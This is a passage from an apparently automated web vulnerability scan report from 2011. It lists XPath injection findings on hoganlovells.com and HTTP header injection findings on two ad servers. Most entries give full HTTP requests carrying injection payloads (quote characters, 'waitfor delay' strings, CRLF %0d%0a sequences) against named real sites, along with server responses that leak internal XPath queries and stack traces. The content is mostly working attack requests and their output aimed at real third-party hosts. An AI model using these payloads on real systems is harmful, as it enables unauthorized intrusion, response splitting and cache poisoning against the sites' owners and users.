2.19. http://www.hoganlovells.com/newsmedia/newspubs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6663
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia/newspubs'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.20. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.21. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs%2527/List HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.22. http://www.hoganlovells.com/newsmedia/newspubs/List [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/newspubs/List%2527 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:37 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.23. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.24. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/newspubs/detail.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:55:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.25. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia'/timeline/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.26. http://www.hoganlovells.com/newsmedia/timeline/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/timeline'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:57:48 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.27. http://www.hoganlovells.com/offices/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /offices/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /offices'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:59 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.28. http://www.hoganlovells.com/ourpeople/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ourpeople/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ourpeople'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:00:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ourpeople'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.29. http://www.hoganlovells.com/practiceareas/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /practiceareas/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /practiceareas'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.30. http://www.hoganlovells.com/ru/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ru/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ru',0,0,0)waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.31. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash'waitfor%20delay'0%3a0%3a20'--/alumni/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.32. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash/alumni'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:32 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

3. HTTP header injection

There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9e34b%0d%0a9d55c7da001 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9e34b%0d%0a9d55c7da001;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-2.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9e34b
9d55c7da001
;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826:
Date: Sat, 16 Apr 2011 13:47:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 29793%0d%0a6b9998c57bd was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=29793%0d%0a6b9998c57bd&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
